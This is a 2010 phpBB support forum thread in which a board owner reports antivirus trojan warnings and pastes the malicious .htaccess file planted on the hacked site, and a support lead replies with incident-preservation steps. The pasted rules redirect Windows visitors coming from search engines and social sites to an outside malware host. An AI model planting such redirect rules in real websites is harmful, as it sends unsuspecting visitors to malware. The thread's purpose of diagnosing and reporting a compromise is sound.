help, hacked.

Get help with installation and running phpBB 3.0.x here. Please do not post bug reports, feature requests, or MOD-related questions here.
Suggested Hosts
Forum rules
END OF SUPPORT: 1 January 2017 (announcement)
Locked
mick2
Registered User
Posts: 40
Joined: Wed Dec 30, 2009 7:46 pm

help, hacked.

Post by mick2 » Thu May 20, 2010 11:56 pm

hi, myself and other users have been getting warnings of a trojan when we visit the site. avg pops up with this.
"The page you are trying to access has been identified as a known exploit, phishing, or social engineering web site and therefore has been blocked for your safety. Without protection, such as that in the AVG Security Toolbar and AVG, your computer is at risk of being compromised, corrupted or having your identity stolen. Please follow one of the suggestions below to continue.

URL: dns.thesoulfoodcafe.com/main.php?e=4&h=www.thetwats.co.uk&i=Jcivi9cfo/ulgBj7VsdDz54XpA==
Name: Rogue MCOS (type 1041)"

when i checked inside the .htaccess file in the php folder it contains this content
"ErrorDocument 500 http://dns.thesoulfoodcafe.com/main.php ... 4XpA==&e=0
ErrorDocument 502 http://dns.thesoulfoodcafe.com/main.php ... 4XpA==&e=2
ErrorDocument 403 http://dns.thesoulfoodcafe.com/main.php ... 4XpA==&e=3

RewriteEngine On

RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*odnoklassniki.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*vkontakte.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*tube.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*blogger.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*baidu.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*qq\.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*myspace.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*twitter.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*facebook.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*amazon.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ebay.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*linkedin.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*flickr.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*livejasmin.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*soso.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*doubleclick.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*pornhub.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*orkut.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*livejournal.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*wordpress.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC]

RewriteCond %{HTTP_USER_AGENT} .*Windows.*
RewriteRule .* http://dns.thesoulfoodcafe.com/main.php ... dDz54XpA== [R,L]

RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png$
RewriteCond %{HTTP_USER_AGENT} .*Windows.*
RewriteRule .* http://dns.thesoulfoodcafe.com/main.php ... dDz54XpA== [R,L]"

is it ok for me to simply delete this file and replace it with one from a backup?
how did they mange to get access to our forum to do this? this is our second hack this year, the previous one was sending out mass emails.
why do folks get kicks out of doing this stuff?

User avatar
Noxwizard
Support Team Leader
Support Team Leader
Posts: 10338
Joined: Mon Jun 27, 2005 8:41 pm
Location: Texas, USA
Name: Patrick Webster
Contact:

Re: help, hacked.

Post by Noxwizard » Fri May 21, 2010 12:02 am

Please do the following:
ReadMe Before Posting / Frequently Asked Questions wrote:My board has been hacked, what do I do?
Please do the following before making any modifications to your board (this includes changing passwords, editing files, running the support toolkit, etc.):
  1. Save a copy of the files (simply create a local copy of the files on the server).
  2. Save a copy of the database.
  3. Save the server access logs for the time of the hack (they may be available in the 'logs' directory on the server, in your host's control panel or only by request directly from your host).
  4. File a report in the incident tracker. Attach the items from steps 1-3 when you file the report or upload them to a secure location for the incident investigation team to download. Please do not start a new topic on the board, the proper place for incidents reports is the tracker.
If you have further questions, please ask them on your ticket. Thanks.
[Support Template] - [Read Before Posting] - [phpBB Knowledge Base]
Do not contact me for private support, please share the question in our forums.

Locked

Return to “[3.0.x] Support Forum”